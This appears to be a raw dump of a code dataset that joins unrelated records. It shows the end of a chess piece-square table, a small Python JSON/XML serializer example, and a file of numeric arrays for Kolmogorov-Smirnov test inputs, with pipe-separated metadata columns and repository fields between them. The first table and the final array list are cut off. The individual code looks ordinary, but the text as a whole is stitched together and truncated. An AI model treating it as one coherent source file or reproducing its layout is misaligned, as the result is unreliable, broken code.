    [-3.0, 0.5, 1.5, 2.0, 2.0, 1.5, 0.5, -3.0],
    [-3.0, 0.0, 1.5, 2.0, 2.0, 1.5, 0.0, -3.0],
    [-3.0, 0.5, 1.0, 1.5, 1.5, 1.0, 0.5, -3.0],
    [-4.0, -2.0, 0.0, 0.5, 0.5, 0.0, -2.0, -4.0],
    [-5.0, -4.0, -3.0, -3.0, -3.0, -3.0, -4.0, -5.0]
]

# Bishops: prefer long central diagonals, avoid edges.
bishop_cost = [
    [-2.0, -1.0, -1.0, -1.0, -1.0, -1.0, -1.0, -2.0],
    [-1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -1.0],
    [-1.0, 0.0, 0.5, 1.0, 1.0, 0.5, 0.0, -1.0],
    [-1.0, 0.5, 0.5, 1.0, 1.0, 0.5, 0.5, -1.0],
    [-1.0, 0.0, 1.0, 1.0, 1.0, 1.0, 0.0, -1.0],
    [-1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, -1.0],
    [-1.0, 0.5, 0.0, 0.0, 0.0, 0.0, 0.5, -1.0],
    [-2.0, -1.0, -1.0, -1.0, -1.0, -1.0, -1.0, -2.0]
]

# Queen: mild centralization.  NOTE(review): rows 4-5 are left/right
# asymmetric (0.0 vs -0.5, 0.5 vs 0.0); the same asymmetry exists in the
# original published table, so it is reproduced as-is rather than "fixed".
queen_cost = [
    [-2.0, -1.0, -1.0, -0.5, -0.5, -1.0, -1.0, -2.0],
    [-1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -1.0],
    [-1.0, 0.0, 0.5, 0.5, 0.5, 0.5, 0.0, -1.0],
    [-0.5, 0.0, 0.5, 0.5, 0.5, 0.5, 0.0, -0.5],
    [0.0, 0.0, 0.5, 0.5, 0.5, 0.5, 0.0, -0.5],
    [-1.0, 0.5, 0.5, 0.5, 0.5, 0.5, 0.0, -1.0],
    [-1.0, 0.0, 0.5, 0.0, 0.0, 0.0, 0.0, -1.0],
    [-2.0, -1.0, -1.0, -0.5, -0.5, -1.0, -1.0, -2.0]
]

# King (middlegame table): stay on the back rank behind pawns; the positive
# values on the last two rows reward castled positions.
king_cost = [
    [-3.0, -4.0, -4.0, -5.0, -5.0, -4.0, -4.0, -3.0],
    [-3.0, -4.0, -4.0, -5.0, -5.0, -4.0, -4.0, -3.0],
    [-3.0, -4.0, -4.0, -5.0, -5.0, -4.0, -4.0, -3.0],
    [-3.0, -4.0, -4.0, -5.0, -5.0, -4.0, -4.0, -3.0],
    [-2.0, -3.0, -3.0, -4.0, -4.0, -3.0, -3.0, -2.0],
    [-1.0, -2.0, -2.0, -2.0, -2.0, -2.0, -2.0, -1.0],
    [2.0, 2.0, 0.0, 0.0, 0.0, 0.0, 2.0, 2.0],
    [2.0, 3.0, 1.0, 0.0, 0.0, 1.0, 3.0, 2.0]
]
| 43.738462
| 61
| 0.29089
| 780
| 2,843
| 1.052564
| 0.016667
| 0.596833
| 0.697929
| 0.769793
| 0.950061
| 0.940317
| 0.9257
| 0.90134
| 0.868453
| 0.762485
| 0
| 0.414239
| 0.347872
| 2,843
| 64
| 62
| 44.421875
| 0.028587
| 0
| 0
| 0.220339
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 12
|
4520232d223d736092916e501854fac6fd19e33a
| 1,672
|
py
|
Python
|
learning_new_technique_sandbox/src/desing_pattern/factory_method/serializers.py
|
qingchaowang/learning_sandbox
|
cfc756bc5abd944935213b2ef90beab7d40d5d18
|
[
"MIT"
] | null | null | null |
learning_new_technique_sandbox/src/desing_pattern/factory_method/serializers.py
|
qingchaowang/learning_sandbox
|
cfc756bc5abd944935213b2ef90beab7d40d5d18
|
[
"MIT"
] | null | null | null |
learning_new_technique_sandbox/src/desing_pattern/factory_method/serializers.py
|
qingchaowang/learning_sandbox
|
cfc756bc5abd944935213b2ef90beab7d40d5d18
|
[
"MIT"
] | null | null | null |
# In serializers.py
#
# Factory-method example: two interchangeable serializer "products" with the
# same start_object / add_property / to_str interface.
#
# BUG FIX: the original file contained its own contents pasted twice (the
# second copy began mid-line after `self._current_object = None`), leaving a
# truncated first JsonSerializer, stray Json methods appended inside the
# first XmlSerializer, and full redefinitions of both classes afterwards.
# Python's last-definition-wins semantics meant the runtime behavior was that
# of the clean file below, so deduplicating preserves behavior exactly.
import json
import xml.etree.ElementTree as et


class JsonSerializer:
    """Serialize one object (an id plus named properties) to a JSON string."""

    def __init__(self):
        # Dict under construction; created by start_object, extended by
        # add_property.  to_str before start_object serializes None -> "null".
        self._current_object = None

    def start_object(self, object_name, object_id):
        # object_name is unused in the JSON representation; only the id
        # is recorded.  Kept for interface parity with XmlSerializer.
        self._current_object = {
            'id': object_id
        }

    def add_property(self, name, value):
        self._current_object[name] = value

    def to_str(self):
        return json.dumps(self._current_object)


class XmlSerializer:
    """Serialize one object to an XML string with properties as child tags."""

    def __init__(self):
        # Root element under construction.
        self._element = None

    def start_object(self, object_name, object_id):
        self._element = et.Element(object_name, attrib={'id': object_id})

    def add_property(self, name, value):
        prop = et.SubElement(self._element, name)
        prop.text = value

    def to_str(self):
        return et.tostring(self._element, encoding='unicode')
| 24.955224
| 73
| 0.656699
| 214
| 1,672
| 4.82243
| 0.172897
| 0.077519
| 0.131783
| 0.05814
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0.241627
| 1,672
| 67
| 74
| 24.955224
| 0.81388
| 0.020933
| 0
| 0.956522
| 0
| 0
| 0.013456
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.347826
| false
| 0
| 0.086957
| 0.086957
| 0.608696
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 9
|
18f88648a1b22ced8b5694a10b9e45b968aa2a62
| 62,227
|
py
|
Python
|
app/python/testing/user_input_files/KS_input_examples.py
|
RadjaHachilif/agotool
|
2fcc3fd5a156053b528ec927bab79ddaf7af2dec
|
[
"MIT"
] | 6
|
2016-04-14T11:47:43.000Z
|
2022-01-29T14:34:59.000Z
|
app/python/testing/user_input_files/KS_input_examples.py
|
RadjaHachilif/agotool
|
2fcc3fd5a156053b528ec927bab79ddaf7af2dec
|
[
"MIT"
] | 2
|
2019-12-21T12:15:46.000Z
|
2021-01-08T12:22:17.000Z
|
app/python/testing/user_input_files/KS_input_examples.py
|
RadjaHachilif/agotool
|
2fcc3fd5a156053b528ec927bab79ddaf7af2dec
|
[
"MIT"
] | 1
|
2021-03-04T10:26:18.000Z
|
2021-03-04T10:26:18.000Z
|
# Foreground sample for a Kolmogorov-Smirnov input example; values are a
# 3-element subset of the bg_1 background distribution below (presumably
# log-transformed measurements — TODO confirm against the KS test caller).
fg_1 = [2.71355896020348, 2.59658440428213, 2.45153772275136]
bg_1 = [-8.32643470076795, -8.12926078021377, -8.06480495716629, -7.91650311880841, -7.83801246222857, -7.70583778501837, -7.52738966855758, -7.49777367765364, -7.46651942330827, -7.42355926825873, -7.30100855923803, -7.26350122359286, -7.19468100328791, -7.13961252138971, -7.05545005462474, -7.03430813260908, -7.03089483430696, -7.02251373739152, -6.86645118823921, -6.85898908383128, -6.84855344412137, -6.76730879143088, -6.7664972463577, -6.69533136777946, -6.61277822936154, -6.58502157909065, -6.57284941377777, -6.48626842620612, -6.45986392537447, -6.441174858703, -6.41827521708809, -6.38452118966051, -6.36363468782975, -6.36076969181797, -6.26240701383164, -6.25317971847765, -6.2365389484951, -6.15648608681838, -6.15346814841415, -6.13426879717682, -6.08299484961717, -6.07448195514896, -6.07291813132705, -5.99612353985798, -5.98325289595672, -5.97435574341204, -5.95224905793447, -5.94667848489343, -5.9334583297072, -5.93251599928652, -5.89242499010306, -5.89125543330919, -5.87878829845967, -5.87466394085314, -5.8294477431172, -5.80105853438803, -5.77627544673249, -5.77570752439622, -5.77316736458519, -5.77104152357156, -5.73460384423021, -5.73224218231378, -5.71982626290828, -5.70008179669666, -5.69996938749922, -5.68781951940129, -5.64240743669934, -5.62788710170745, -5.60912454884795, -5.60733066321827, -5.58805534802067, -5.58482481806554, -5.5794352703236, -5.53619100793383, -5.5266917671331, -5.5013015283131, -5.49985868979162, -5.48514216653179, -5.47736351108885, -5.44794192762878, -5.44554285489525, -5.43436122520384, -5.43024773291195, -5.37874070417799, -5.37704368474112, -5.35464917492812, -5.34442189805867, -5.33991419491576, -5.32868519351564, -5.31778213754401, -5.30306045586955, -5.3018475947231, -5.30091946696228, -5.25002227237239, -5.20584852774195, -5.20379059906394, -5.17743188426567, -5.16932479991793, -5.15031174731268, -5.13724801369195, -5.13307999171822, -5.11070697893696, -5.10240145654282, -5.07286140986759, -5.02760949945728, 
-4.99389860645012, -4.99228153882051, -4.99158560578963, -4.98205158522702, -4.96403610389916, -4.96328578973434, -4.94830439636911, -4.93906291736347, -4.92474749895853, -4.92445006776066, -4.89244047976311, -4.88765714056338, -4.88446663436502, -4.85908698649547, -4.85596846974296, -4.85301720947498, -4.84994872577491, -4.82468714549179, -4.82093054094259, -4.81719423395266, -4.79960585993681, -4.79450958271145, -4.77593074310967, -4.76841931287922, -4.76152297009406, -4.73846761455964, -4.73556791826794, -4.7185781141044, -4.712204905786, -4.7085871626959, -4.65837612363627, -4.65427993822297, -4.64096368709234, -4.63976609134064, -4.63606798349776, -4.62230545208703, -4.61119941428037, -4.6101644135773, -4.60505070674488, -4.60216228476108, -4.56137108384481, -4.55919537628411, -4.55335737628244, -4.55119618911966, -4.54980192690798, -4.54762237714311, -4.54188476930851, -4.53663518485849, -4.53058010718047, -4.51933985531769, -4.48348483127313, -4.4789489171353, -4.47394478794731, -4.46774231867997, -4.44509259526265, -4.44393091915643, -4.41519434826907, -4.40567579039357, -4.38984168168106, -4.38016997298702, -4.35618957798525, -4.35084831820702, -4.35027464418738, -4.34908071042421, -4.32140309049286, -4.3026983120069, -4.28127018096359, -4.26972319433717, -4.26279848868902, -4.25560959729774, -4.25373930341165, -4.23797385436194, -4.23669738961331, -4.22149916876285, -4.18723301641402, -4.18190189283134, -4.18100834652305, -4.16968343025405, -4.14868010962359, -4.14457377659363, -4.14239705929054, -4.14047669165511, -4.11415349374522, -4.11135553123405, -4.10575170887277, -4.09232563163418, -4.09001981140879, -4.08683323132099, -4.06467422195542, -4.06015133811765, -4.05869532969368, -4.04635050515043, -4.03120132024633, -4.01617685055156, -3.96666702360362, -3.96111826986238, -3.96088412029899, -3.92779757574645, -3.92663168005016, -3.91628868482989, -3.90326485061218, -3.8902413394591, -3.88856013085311, -3.88853056225145, -3.88646320176686, 
-3.86721023073069, -3.86668849343774, -3.86148832472908, -3.86053574623235, -3.86008300380152, -3.83684112266378, -3.83282840214479, -3.81732132568477, -3.78993550268502, -3.78016445091877, -3.77412655275942, -3.77249249109146, -3.74057457477842, -3.73755650219373, -3.73226395329731, -3.72386617201012, -3.72021562121906, -3.71898137800479, -3.71465105176757, -3.70112389718105, -3.6727357100468, -3.65198571605545, -3.64391833103247, -3.6297016692636, -3.62810333515983, -3.608608201615, -3.58299251896378, -3.5821486739471, -3.57436950378065, -3.57244462966279, -3.56929711128091, -3.56414715368633, -3.5465551444108, -3.54574405303921, -3.54378507078218, -3.54374843954636, -3.53627979821756, -3.53243955993852, -3.5291363433243, -3.52643657837631, -3.52506369870443, -3.51789646877019, -3.51576723748925, -3.50927661941198, -3.50798217407424, -3.48539377978139, -3.47420239243753, -3.46141463323791, -3.46024518051199, -3.45973890216053, -3.45875555338156, -3.41725292690291, -3.41497199034076, -3.41104150037547, -3.39358717592219, -3.39213960981569, -3.38745902791139, -3.38348051871965, -3.37430019897601, -3.36031348867417, -3.34441155395612, -3.34229004818493, -3.32998660406781, -3.31605346212567, -3.30959669083528, -3.30698486763005, -3.30236924631106, -3.29820033833118, -3.29401239991304, -3.29346112379973, -3.29070668028697, -3.28648843706492, -3.27989558333408, -3.27691418241743, -3.27200608439279, -3.27058992995483, -3.26573893978849, -3.25113134851702, -3.24546302689538, -3.24467195487936, -3.23935453458173, -3.23110167819537, -3.2238276633626, -3.21674202072185, -3.20865216914659, -3.19892803116475, -3.18854086902297, -3.18423974989327, -3.18265949423004, -3.16870357712785, -3.16532353749055, -3.15622209295322, -3.1552324492251, -3.15395372424389, -3.15118990810437, -3.13021741861799, -3.12559133401462, -3.11240135367784, -3.11217628549985, -3.10828152469296, -3.10533515880712, -3.10308704679552, -3.09299592894098, -3.09093642543836, -3.09079988688351, 
-3.08997117150615, -3.07307851860216, -3.07210350144952, -3.06415790295611, -3.05788627034772, -3.05162979971371, -3.05078244282525, -3.05043285501393, -3.04950378251821, -3.0392394168758, -3.03511181367061, -3.0349059504027, -3.02833441418166, -3.025363962075, -3.01031424112599, -2.99641559568854, -2.98536912788274, -2.98489702593985, -2.98008594073884, -2.97765479033361, -2.97339459676949, -2.97027828134747, -2.96776098678398, -2.96512122723563, -2.96421529567905, -2.96251814148259, -2.95549465020861, -2.95408873676075, -2.95281226047047, -2.9344291340757, -2.93432434536786, -2.93002562218533, -2.92900680356523, -2.92694516038843, -2.92587242998372, -2.92503107366644, -2.92065571663921, -2.9110643721586, -2.89443532386475, -2.89442844994519, -2.86978685645832, -2.85943837208249, -2.85387228779441, -2.83373560028208, -2.83254376531638, -2.82702383493164, -2.82083700652804, -2.81850808228868, -2.80867573129957, -2.80781001620288, -2.80048681845322, -2.80032756014568, -2.79741968162439, -2.79596140349676, -2.78506132231634, -2.78284483026523, -2.7800802743299, -2.77780812004533, -2.76859332955662, -2.76224188325119, -2.74638852169022, -2.74189460920298, -2.74176761117359, -2.73705167951016, -2.73572136828971, -2.72884879914086, -2.72804003474724, -2.72802748955124, -2.72121307897118, -2.71132694596897, -2.7106737455993, -2.69221752992228, -2.6858838877386, -2.67936620209641, -2.67742461607703, -2.67522471223764, -2.67468122321351, -2.66706478775549, -2.66542815683533, -2.6638899973071, -2.6591427901747, -2.65449278371109, -2.6498856835267, -2.6468478815723, -2.64132067622366, -2.62703509095644, -2.62600762120414, -2.6255669632796, -2.62543650333752, -2.6248465982971, -2.62479477935021, -2.62156069698757, -2.6196490309563, -2.6189845962678, -2.61734717079125, -2.61395378406467, -2.60130128799689, -2.59894719086357, -2.59803358347537, -2.59268243788184, -2.5881980630896, -2.58650578537472, -2.58323535214077, -2.57377538537865, -2.56855584008607, -2.56732158394214, 
-2.5620420166921, -2.56155766302635, -2.55893433096706, -2.54877246832393, -2.54620547834289, -2.53769881863222, -2.52879229374978, -2.52689232596764, -2.5222870603308, -2.51900276142976, -2.50285674743039, -2.50031889131413, -2.4949158812924, -2.49139711942209, -2.48812939258639, -2.48383568506359, -2.47998929963482, -2.47588659071293, -2.47212391684667, -2.46868127491303, -2.4666390582227, -2.46268553769944, -2.45542879893428, -2.45313080031999, -2.45058338417446, -2.43997330504517, -2.4388147705156, -2.43675681357139, -2.43362585935822, -2.4320543755034, -2.43034015973118, -2.42975616820674, -2.4284167206258, -2.42840120325971, -2.42557735615568, -2.41752122107817, -2.41695562741707, -2.41469603158351, -2.40765091259847, -2.40099303490722, -2.39761029925005, -2.39143127517876, -2.38921730971439, -2.37354485968924, -2.37008913736568, -2.36907875332741, -2.36085587755146, -2.35541216581853, -2.35499775477767, -2.35483214155369, -2.35070694879604, -2.34524287183516, -2.34507119777619, -2.34349521897481, -2.33765735033273, -2.3302582533367, -2.32533368220489, -2.3130760663946, -2.30834983167064, -2.30614355271168, -2.30436640666394, -2.2959493427459, -2.29560949598717, -2.29415492436455, -2.28988219699669, -2.27987657429476, -2.26747189590981, -2.26728600354136, -2.26217920539588, -2.25995201153298, -2.25868195286177, -2.24643023228834, -2.24419337219989, -2.22646753427998, -2.2248842157761, -2.21857327985432, -2.21673728593081, -2.21105867150559, -2.20860428693124, -2.20703342922843, -2.20663361700686, -2.20583784790456, -2.19848235739652, -2.19315969555728, -2.19199814376301, -2.19073833511308, -2.17433630908843, -2.17346520150056, -2.16156703827477, -2.16073137533335, -2.15399869414511, -2.15258549410078, -2.14925922904975, -2.14499668676072, -2.14446876519314, -2.13380114327829, -2.13157357686132, -2.13152501741489, -2.12564373875284, -2.12083939056405, -2.11616109041893, -2.11533374684416, -2.1153073664903, -2.10681104845128, -2.10574664635352, 
-2.10277015776226, -2.1012183024032, -2.1004697087009, -2.09468160013629, -2.09149244560058, -2.08205219304469, -2.07685709593545, -2.07345361601096, -2.07211556813827, -2.05252517024539, -2.04934610492274, -2.04871672377998, -2.04670854627056, -2.0400029596935, -2.03931378429032, -2.03808888829879, -2.03375667864032, -2.03072390622845, -2.02359300958761, -2.01988602190739, -2.01474367779591, -2.00669398273574, -2.00354457486203, -1.99369290915384, -1.99024871387742, -1.98445859115386, -1.9821294855594, -1.97924778860837, -1.96692563333921, -1.96492470874042, -1.9644918223324, -1.96084409424985, -1.95320676156059, -1.93599010446892, -1.93441506584989, -1.9336134502564, -1.92805935288047, -1.9280244354887, -1.91901672737759, -1.91272578031586, -1.91150876386419, -1.90073423791214, -1.89957983020343, -1.88765495072017, -1.88622428890795, -1.88608611875168, -1.88531486347853, -1.87717273864848, -1.87658305870155, -1.87549862121653, -1.87073425916746, -1.86981225704331, -1.86872330459009, -1.86639491917143, -1.86529601002448, -1.86103342961632, -1.85776566863776, -1.84885822239558, -1.84457033937804, -1.84133858785801, -1.83923593052807, -1.83372921246915, -1.82417848446868, -1.82095539634476, -1.81888404766071, -1.81299618469462, -1.80668342478886, -1.80258262438383, -1.79870864312059, -1.79617739391335, -1.79598032193387, -1.79344908452896, -1.79246569229923, -1.79032319641819, -1.78872160656364, -1.78542927907352, -1.78492531186077, -1.78444022854041, -1.78298712630417, -1.78257525222681, -1.78066956692608, -1.77724586121844, -1.77603743244057, -1.77497437252417, -1.76432868130879, -1.76430636567513, -1.75838803509438, -1.75353711286565, -1.75307104343078, -1.75186748297339, -1.75169097375475, -1.74943505108089, -1.74866732133724, -1.7466271458849, -1.74620593433065, -1.74454422989634, -1.74449082726857, -1.73799975015413, -1.72817956395629, -1.72681720539307, -1.72553416973442, -1.7194947508813, -1.71809131961518, -1.71584421005811, -1.71459267042556, 
-1.71150902527557, -1.71142438616402, -1.70896476317588, -1.70724457088539, -1.7017517285505, -1.69998651599094, -1.69071358483784, -1.68920231264234, -1.68886993315355, -1.67714395258884, -1.66454274603339, -1.66290029197517, -1.65387857628297, -1.65242706346631, -1.65007686752239, -1.64979257195518, -1.64740574748032, -1.64478507070937, -1.63691527242944, -1.63541426577976, -1.6327064573579, -1.63265623866541, -1.63148041397343, -1.62971495288362, -1.62503259960895, -1.62280426560118, -1.61989195197603, -1.61039430903756, -1.60001928103155, -1.59717098280561, -1.59474711580785, -1.59455861619267, -1.59226994066529, -1.58219629028104, -1.58050160213268, -1.57554015279906, -1.57507155306422, -1.5732595618904, -1.571786907985, -1.56617034525202, -1.5630080754445, -1.55512318728101, -1.55174935433394, -1.54963968438918, -1.53477639911934, -1.53247120433308, -1.53241289360217, -1.53206025842873, -1.53014869245035, -1.5255748391867, -1.52499561770544, -1.52149753136422, -1.51907576624032, -1.51788004125355, -1.50196896772363, -1.49754270499549, -1.49752942111276, -1.49314621137239, -1.48357161450625, -1.47396214308553, -1.47087249010024, -1.46898302979973, -1.46611547540387, -1.46500561776518, -1.45595699028627, -1.45490778922291, -1.44350058978854, -1.44089317066432, -1.43555137796401, -1.42790013474591, -1.42177423917028, -1.41703537765471, -1.41404386184681, -1.40567571616606, -1.3993016143028, -1.39744741025476, -1.39650055236661, -1.38821615675844, -1.37981917491177, -1.34453217829785, -1.33543223554228, -1.32748620572223, -1.32619807482176, -1.32256908092003, -1.32086656554565, -1.31093958956234, -1.30612644055616, -1.30218378750615, -1.292390189237, -1.28624821180639, -1.2837370442399, -1.26135848707404, -1.26076130475925, -1.25880691794561, -1.25144698413725, -1.25040616920522, -1.24795259106321, -1.24462610121405, -1.23520396459594, -1.23258565931548, -1.23214383189408, -1.20420769047093, -1.19115956516894, -1.18850141299861, -1.18784132944629, 
-1.18312197985725, -1.18141103239185, -1.17198667518472, -1.1574473884479, -1.15547302875988, -1.15436184512092, -1.1492782786143, -1.14512772755633, -1.13333472235356, -1.13144201628438, -1.12758436826972, -1.1275262270534, -1.11604170754024, -1.11196663676282, -1.10653838735955, -1.10355835173696, -1.09426621454289, -1.08902293323313, -1.08230964724019, -1.08189678878143, -1.06947177159841, -1.06246750400604, -1.0507235919501, -1.04238716875262, -1.04002845756691, -1.03776283558259, -1.03100089406809, -1.02715039124769, -1.02482140105725, -1.01632881790586, -1.01264478082765, -1.00648174964558, -1.00572341041694, -0.995472313986702, -0.99256485331236, -0.988580000017022, -0.957848063220885, -0.93283578520007, -0.924828866057543, -0.921065089580478, -0.90090746786517, -0.880837749577085, -0.85245992296553, -0.847329067619522, -0.827499774943424, -0.825478162495361, -0.823005326357598, -0.820833134567771, -0.770283884793913, -0.72387440044806, -0.711615267900462, -0.689885884022624, -0.689530886654175, -0.657472831578137, -0.642788428086676, -0.607595078923237, -0.591722161954329, -0.492097069045875, -0.489076513247852, -0.477558238091107, -0.428102620439042, -0.338629448431751, -0.326670211958466, -0.324378464023917, -0.298708415917137, -0.209655625601901, -0.129565619268835, 0.0459296900675103, 0.138587255889901, 0.167122788074793, 0.250164879103255, 0.38805696412105, 0.388117026693325, 0.388226676241142, 0.46114992999589, 0.477397967012959, 0.515148585239905, 0.554924814842295, 0.563932128443976, 0.631964260977664, 0.653223377815047, 0.667694845910074, 0.710098342595984, 0.713170713096676, 0.717989916797078, 0.738811457761873, 0.739235071658754, 0.741557291838533, 0.743043353195949, 0.764158303808917, 0.785388077706216, 0.801267672769671, 0.805025125412237, 0.814814353247987, 0.819279873236768, 0.828760315586074, 0.841718725297425, 0.870852520173949, 0.885189968127755, 0.89381721250527, 0.909470630874892, 0.910520758770315, 0.917015818930873, 0.927323175823553, 
0.938036977604359, 0.943106311822479, 0.946348078874905, 0.954635466126727, 0.960191098886339, 0.969856620706237, 0.983343741059723, 0.989355372568323, 0.992604751345429, 0.999630859191061, 1.00192707606825, 1.0091056926022, 1.00913072142497, 1.01400653547193, 1.0451369882041, 1.04720960248872, 1.04848874296014, 1.05206912241713, 1.06840533126208, 1.07177222565555, 1.07765601331905, 1.10044306508489, 1.14521855910075, 1.14721025372615, 1.15117176566609, 1.15368418944538, 1.17365742844115, 1.18232596918433, 1.20252852661979, 1.20690250131736, 1.21028709095634, 1.21334406479577, 1.21732093182956, 1.21801680712667, 1.22436923497591, 1.23329981994489, 1.25977675993613, 1.27576186496016, 1.28173932980657, 1.29279270197421, 1.29807749565535, 1.31514427140457, 1.32277216941972, 1.32309098256522, 1.33327008571054, 1.33832806064235, 1.34075883200151, 1.35250997801875, 1.3539830942859, 1.35850407702677, 1.36778649133896, 1.36862462149624, 1.37363355429464, 1.37484067333569, 1.38754529273882, 1.38872814665393, 1.39558125510676, 1.40814588149176, 1.44557822484993, 1.47530752297389, 1.48156311994824, 1.48401985822081, 1.49274700696083, 1.50033361885617, 1.50091286445433, 1.50346960183587, 1.50558135644419, 1.5274697562299, 1.53155647907915, 1.53603694612939, 1.54847718136891, 1.56878532698145, 1.57310643991257, 1.62162603796759, 1.62724662946682, 1.6311703892394, 1.63278022906532, 1.63286277246058, 1.6390052219977, 1.64216618713934, 1.64774594814051, 1.65108720634525, 1.65419548542931, 1.65507482456591, 1.65686713620059, 1.66119216987342, 1.66324387968644, 1.69538281930072, 1.69943010687876, 1.71835249991339, 1.72218624392784, 1.72665629108124, 1.7305415588152, 1.74247528855006, 1.75904901577023, 1.76789095742535, 1.77612709066103, 1.78511430654618, 1.79136198982229, 1.82142296458901, 1.82427659994177, 1.83141481960834, 1.83407792478098, 1.83507741652202, 1.84156822274656, 1.84604908108617, 1.85206282259832, 1.85501897137491, 1.85514726519441, 1.8725780583658, 1.8733110072085, 
1.87702099485335, 1.8819786568054, 1.88653634536034, 1.88852330644768, 1.8922043980357, 1.92516259478729, 1.94267291353469, 1.98582750997238, 1.99285206337604, 1.99651440482193, 2.01260608164314, 2.01988206381339, 2.02654826883426, 2.03618133832892, 2.03962302659235, 2.0693423850561, 2.06986023383023, 2.07015511787096, 2.07981650099165, 2.09031096027266, 2.09794235989014, 2.10257313307331, 2.10283684013321, 2.11076677079529, 2.11345884319228, 2.11997846567281, 2.13480219730788, 2.13849594322748, 2.14014159423894, 2.14179613678729, 2.14546007755766, 2.15640334005494, 2.16179414876137, 2.18403438846943, 2.19811639987397, 2.20619657334253, 2.21422460341567, 2.21452378213307, 2.21627902918735, 2.22041612115193, 2.22517013985275, 2.22755164471054, 2.23416748291575, 2.24069215171696, 2.24153000593021, 2.25022483167014, 2.27827647213403, 2.28982723339836, 2.29243374383072, 2.30501805850302, 2.32158720203675, 2.32176742483064, 2.32178739485438, 2.331543058417, 2.3484316133167, 2.36610293793904, 2.36776511631972, 2.37491717417071, 2.37590849297063, 2.38261363024158, 2.44474259928041, 2.45065300086489, 2.45153772275136, 2.47214468657032, 2.53382334332036, 2.54913699632984, 2.56931454383761, 2.57045306287182, 2.57214556418502, 2.58536599752475, 2.58601242708292, 2.59658440428213, 2.60519113174386, 2.63014087680095, 2.64564991719137, 2.67922294868574, 2.69094444201124, 2.69378604148733, 2.70156045632584, 2.71355896020348, 2.72846673795643, 2.73273068190486, 2.74053944561202, 2.75646951941922, 2.77919130707459, 2.83037773693719, 2.85396841128117, 2.87189699646583, 2.87445930157727, 2.90438045626719, 2.90648625657812, 2.91629826551014, 2.92062296024744, 2.93240975984361, 2.95461889311079, 2.99659804937327, 3.00644546362766, 3.0401219204868, 3.10479018806494, 3.13048800094528, 3.13187383863909, 3.20422879636909, 3.21606576156584, 3.24892400229704, 3.46836466129959, 3.5775741166786, 3.58707758359076, 3.64691463194454, 3.67382885933952, 3.68153339403736, 3.7023603699075, 
3.74797284255835, 3.76800916543556, 3.84570423193084, 4.01723852946342, 4.06951125405614, 4.11724952712395, 4.12817984248988, 4.20874721492816, 4.32576917599121, 4.63994743989415, 4.78808672479767, 4.8547560668931, 5.63873268099544]
fg_2 = [-2.42557735615568, -2.34507119777619, -4.99389860645012, -5.97435574341204, -6.36076969181797, -2.79596140349676, -6.38452118966051, -1.26076130475925, -1.68886993315355, -2.09468160013629, -4.76152297009406, -4.11415349374522, -1.292390189237, -3.11240135367784, -5.93251599928652, -5.13307999171822, -4.89244047976311, -6.86645118823921, -1.30612644055616, -5.77104152357156, -7.83801246222857, -7.91650311880841, -8.32643470076795, -4.26972319433717, -2.6591427901747, -1.96492470874042, -5.43024773291195, -3.83684112266378, -5.77316736458519, -2.60130128799689, -2.93432434536786, -4.60216228476108, -6.15346814841415, -5.25002227237239, -5.89125543330919, -5.58482481806554, -4.06467422195542, -5.80105853438803, -2.35541216581853, -5.3018475947231, -6.13426879717682, -4.41519434826907, -4.64096368709234, -4.55335737628244, -4.62230545208703, -4.63606798349776, -4.85596846974296, -5.20379059906394, -4.61119941428037, -6.25317971847765, -2.80867573129957, -5.87466394085314, -6.45986392537447, -6.08299484961717, -4.65427993822297, -4.54188476930851, -6.84855344412137, -6.41827521708809, -5.60733066321827, -6.85898908383128, -5.49985868979162, -6.69533136777946, -7.46651942330827, -4.76841931287922, -7.03089483430696, -4.06015133811765, -8.12926078021377, -3.96666702360362, -4.04635050515043, -3.71898137800479, -4.94830439636911, -4.01617685055156, -2.97765479033361, -2.66706478775549, -1.62971495288362, -1.71150902527557]
bg_2 = [-8.32643470076795, -8.12926078021377, -8.06480495716629, -7.91650311880841, -7.83801246222857, -7.70583778501837, -7.52738966855758, -7.49777367765364, -7.46651942330827, -7.42355926825873, -7.30100855923803, -7.26350122359286, -7.19468100328791, -7.13961252138971, -7.05545005462474, -7.03430813260908, -7.03089483430696, -7.02251373739152, -6.86645118823921, -6.85898908383128, -6.84855344412137, -6.76730879143088, -6.7664972463577, -6.69533136777946, -6.61277822936154, -6.58502157909065, -6.57284941377777, -6.48626842620612, -6.45986392537447, -6.441174858703, -6.41827521708809, -6.38452118966051, -6.36363468782975, -6.36076969181797, -6.26240701383164, -6.25317971847765, -6.2365389484951, -6.15648608681838, -6.15346814841415, -6.13426879717682, -6.08299484961717, -6.07448195514896, -6.07291813132705, -5.99612353985798, -5.98325289595672, -5.97435574341204, -5.95224905793447, -5.94667848489343, -5.9334583297072, -5.93251599928652, -5.89242499010306, -5.89125543330919, -5.87878829845967, -5.87466394085314, -5.8294477431172, -5.80105853438803, -5.77627544673249, -5.77570752439622, -5.77316736458519, -5.77104152357156, -5.73460384423021, -5.73224218231378, -5.71982626290828, -5.70008179669666, -5.69996938749922, -5.68781951940129, -5.64240743669934, -5.62788710170745, -5.60912454884795, -5.60733066321827, -5.58805534802067, -5.58482481806554, -5.5794352703236, -5.53619100793383, -5.5266917671331, -5.5013015283131, -5.49985868979162, -5.48514216653179, -5.47736351108885, -5.44794192762878, -5.44554285489525, -5.43436122520384, -5.43024773291195, -5.37874070417799, -5.37704368474112, -5.35464917492812, -5.34442189805867, -5.33991419491576, -5.32868519351564, -5.31778213754401, -5.30306045586955, -5.3018475947231, -5.30091946696228, -5.25002227237239, -5.20584852774195, -5.20379059906394, -5.17743188426567, -5.16932479991793, 